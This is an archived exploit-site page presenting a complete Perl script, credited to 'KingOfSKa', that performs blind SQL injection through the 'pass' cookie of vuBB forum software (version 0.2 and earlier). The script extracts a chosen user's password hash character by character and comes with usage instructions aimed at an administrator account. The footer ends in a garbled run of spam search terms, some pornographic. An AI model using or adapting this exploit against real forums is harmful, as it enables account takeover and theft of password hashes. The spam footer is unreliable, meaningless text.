about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , vuBB <= 0.2 (Cookie) Final Remote SQL Injection Exploit (gpc=off)



2006-03-02 vuBB <= 0.2 (Cookie) Final Remote SQL Injection Exploit (gpc=off)
Rated as : Moderate Risk
#!/usr/bin/perl 
print q{
----------------------------------------------------------------------

	vuBB <=0.2 Final Remote SQL Injection (cookies) Exploit
	
		exploit discovered and coded by KingOfSKa
			
			https://contropotere.netsons.org

----------------------------------------------------------------------

};

use LWP::UserAgent;

   $ua = new LWP::UserAgent;
   $ua->agent("Mosiac 1.0" . $ua->agent);

if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[1]) {$ARGV[1] = '1';}

my $path = $ARGV[0] . '/index.php';
my $user = $ARGV[1];   # userid to jack
my $uname = $ARGV[2];
my $answer = "";
my @charset =
("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");
if (!$ARGV[2])
{
        print q{
		Usage:
		
		perl vubb.pl FULL_URL_TO_VBB VICTIM_USER_ID USER_NICKNAME
		perl vubb.pl http://www.somesite.com/vubb 1 administrator
		
		};
exit();

}
print "[URL:] $path\r\n";
print "[USERID:] $user\r\n";
print "[USERNAME:] $user\r\n";
print "Starting connection...\r\n";

my $j = 0 ;
for( $i=1; $i < 33; $i++ )
{
        for( $j=1; $j < 17; $j++ )
        {
	
                $current = $charset[$j];
		
  my $sql =
"99%27+OR+(id%3d".$user."+AND+MID(pass,".$i.",1)%3d%27".$charset[$j]."%27)/*";

                my @cookie = ('Cookie' => "user=kingofska;
pass=$sql;");
                my $res = $ua->get($path, @cookie);

                $answer = $res->content;
		#print $answer; #Just for debugging...
		if ($answer =~/(.*)Welcome $uname(.*)/){$outputs.= $current; print
"$i/32 found...\r\n"; }
	}

 
}


if ( length($outputs) < 1 )   { print "Not Exploitable!\r\n";
exit;     }
print  "User Hash is: $outputs \r\n";
exit;
securitydot.net - 2006-03-02

Advertising

Copyright 2007, SecurityDot
Fri, 27 Nov 2009 00:47:59 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.taobao Www.Arabsx www.hollyw adoult sex shop337795 http-rpc-e Video porn www.baroba flim.sex live shows lo594l kapersky 7 Indo sex www.sunjin www.zoopor www.eva ra www.shangh www.shangh z...php?op Choot.com z...php?op sweehkexta z...php?op z...php?op z...php?op Zeroboard Zeroboard www.Vagini Macintosh port 5450 Wap.odnokl Zeroboard Zeroboard Zeroboard IMAG SEX news for c sharon sto www.skf-fa pictuersex Exploits S Crack Data www.jogoso xpl/exploi shakeela.b lo395l Paris Hilt sex of tri www.ynzlyb www trisha t868t